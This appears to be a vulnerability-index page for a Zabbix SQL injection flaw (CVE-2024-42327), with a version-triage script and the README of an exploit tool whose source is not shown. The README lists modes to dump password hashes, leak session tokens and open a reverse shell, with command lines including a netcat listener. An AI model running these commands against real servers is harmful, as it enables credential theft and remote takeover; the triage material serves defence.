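Related vulnerability
Title:
Zabbix SQL injection vulnerability
(CVE-2024-42327)
Description: Zabbix is an open-source monitoring system from Zabbix. It supports network monitoring, server monitoring, cloud monitoring and application monitoring. Zabbix versions 6.0.0 through 6.0.31, 6.4.0 through 6.4.16, and 7.0.0 contain a SQL injection vulnerability in the addRelatedObjects function of the CUser class, which allows an attacker to manipulate database queries.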
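For triage, the affected version ranges stated in the description above can be checked against an inventory of Zabbix servers. The following is an added example, not part of the original page or the repository it describes; the hostnames and version strings are constructed, and the function names are hypothetical.

```python
import re

# Affected ranges as stated in the description above (inclusive bounds).
AFFECTED_RANGES = [
    ((6, 0, 0), (6, 0, 31)),
    ((6, 4, 0), (6, 4, 16)),
    ((7, 0, 0), (7, 0, 0)),
]

_VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)\.(\d+)\s*$")


def parse_version(text):
    """Return (major, minor, patch), or None for anything that is not X.Y.Z."""
    m = _VERSION_RE.match(text or "")
    return tuple(int(p) for p in m.groups()) if m else None


def classify(version_text):
    """Return 'affected', 'not-listed' or 'unknown' for one version string."""
    version = parse_version(version_text)
    if version is None:
        # Pre-releases (e.g. 7.0.0rc1) and malformed strings are not covered
        # by the stated ranges, so they are flagged for manual review.
        return "unknown"
    for low, high in AFFECTED_RANGES:
        if low <= version <= high:
            return "affected"
    return "not-listed"


def triage(inventory):
    """Group the hosts of a {host: version} inventory by classification."""
    report = {"affected": [], "not-listed": [], "unknown": []}
    for host, version_text in sorted(inventory.items()):
        report[classify(version_text)].append(host)
    return report


# Constructed sample inventory (hostnames and versions are made up).
SAMPLE_INVENTORY = {
    "mon-a.example.internal": "6.0.31",
    "mon-b.example.internal": "6.0.32",
    "mon-c.example.internal": "6.4.9",
    "mon-d.example.internal": "7.0.0",
    "mon-e.example.internal": "7.0.1",
    "mon-f.example.internal": "7.0.0rc1",
}
```

A result of `not-listed` only means the version is outside the ranges this page names; confirm against the vendor advisory before closing the finding.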
Description
This is for educational purposes only. Please do not use against unauthorized systems.
Introduction
# 🛡️ Zabbix 7.0.0 SQL Injection Exploit Script
A Python script to exploit a **Zabbix 7.0.0** authenticated SQL injection vulnerability, supporting multiple modes of action including user data extraction, session token leaks, remote command execution (RCE), and custom query injection.
> ⚠️ **DISCLAIMER:**
> This script is for **educational** and **authorized penetration testing** purposes only.
> Do **not** use it on systems you do not own or have explicit permission to test.
> The author is not responsible for any misuse or damage caused by this tool.
---
## ✨ Features
- ✅ Authenticated SQL Injection against Zabbix 7.0.0
- 🧑‍💻 Dump user hashes from the DB
- 🔐 Leak session tokens
- 🐚 Remote code execution via reverse shell (admin token required)
- 🧠 Run custom SQL queries
---
## 🔧 Requirements
- Python 3.6+
- `requests` library
Install requirements if needed:
```bash
pip install requests
```
## 🚀 Usage
```bash
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
```
## 🔘 Available Modes
| Mode | Description | Requires Admin Token |
| ------------ | ------------ | ------------ |
| leak-users | Dumps all user IDs, usernames, password hashes, and roles | ❌ |
| leak-tokens | Dumps all active session IDs from the database | ❌ |
| rce | Spawns a reverse shell via item.create exploit | ✅ |
| custom | Run any custom SQL query via the injection | ❌ |
## 🧪 Examples
Dump User Hashes
```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
```
Leak Session Tokens
```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
```
Remote Code Execution (Reverse Shell)
```bash
# Start a listener first:
nc -lvnp 9001
# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
```
Custom SQL Injection
```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
```
## 📁 Project Structure
```bash
sqliZabbix.py # Main exploit script
README.md # This documentation
```
## 🧑‍💻 Author
Anthony (@874anthony)
Crafted with love & curiosity 🐍
## 🔐 License
This project is released under the MIT License. Please use responsibly.
File snapshot
[4.0K] /data/pocs/8d773782fe4c9b62ec1446a853ff598423627407
├── [2.3K] README.md
└── [8.6K] sqliZabbix.py
0 directories, 2 files